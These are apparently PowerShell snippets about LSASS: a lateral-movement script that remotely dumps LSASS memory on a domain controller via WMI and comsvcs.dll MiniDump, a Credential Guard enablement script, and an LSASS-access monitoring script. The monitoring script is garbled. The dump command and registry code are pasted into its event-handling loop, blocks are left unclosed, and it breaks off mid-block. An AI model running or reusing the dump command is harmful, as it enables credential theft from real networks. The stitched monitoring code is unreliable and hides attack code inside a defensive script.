Ghost Ghost-Developmentx

## Lateral-movement-with-LSASS.ps1
# Remote execution using WMI
$target = "DC01.contoso.com"
$cred = Get-Credential

# Create remote CIM session
$session = New-CimSession -ComputerName $target -Credential $cred

# Execute remote dump
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{
    CommandLine = 'rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\lsass.dmp full'

## PowerShell-enablement.ps1
# Enable Credential Guard (requires restart)
# Requires: Windows 10 Enterprise/Education, Windows 11, Server 2016+
# Hardware: TPM 2.0, UEFI, Virtualization extensions

# Enable via registry
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Force
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" `
    -Name "EnableVirtualizationBasedSecurity" -Value 1 -PropertyType DWORD -Force
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" `
    -Name "RequirePlatformSecurityFeatures" -Value 3 -PropertyType DWORD -Force

## Monitor-LSASS-access.ps1
# Enable audit policy for process access
auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable
auditpol /set /subcategory:"Process Creation" /success:enable

# Create scheduled task to monitor LSASS access
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument @"
-NoProfile -WindowStyle Hidden -Command "
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4656,4663} |
Where-Object {`$_.Message -match 'lsass.exe'} |
ForEach-Object {
	# Remote execution using WMI
	$target = "DC01.contoso.com"
	$cred = Get-Credential

	# Create remote CIM session
	$session = New-CimSession -ComputerName $target -Credential $cred

	# Execute remote dump
	Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{
	CommandLine = 'rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\lsass.dmp full'
	# Enable Credential Guard (requires restart)
	# Requires: Windows 10 Enterprise/Education, Windows 11, Server 2016+
	# Hardware: TPM 2.0, UEFI, Virtualization extensions

	# Enable via registry
	New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Force
	New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" `
	-Name "EnableVirtualizationBasedSecurity" -Value 1 -PropertyType DWORD -Force
	New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" `
	-Name "RequirePlatformSecurityFeatures" -Value 3 -PropertyType DWORD -Force
	# Enable audit policy for process access
	auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable
	auditpol /set /subcategory:"Process Creation" /success:enable

	# Create scheduled task to monitor LSASS access
	$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument @"
	-NoProfile -WindowStyle Hidden -Command "
	Get-WinEvent -FilterHashtable @{LogName='Security';ID=4656,4663} \|
	Where-Object {`$_.Message -match 'lsass.exe'} \|
	ForEach-Object {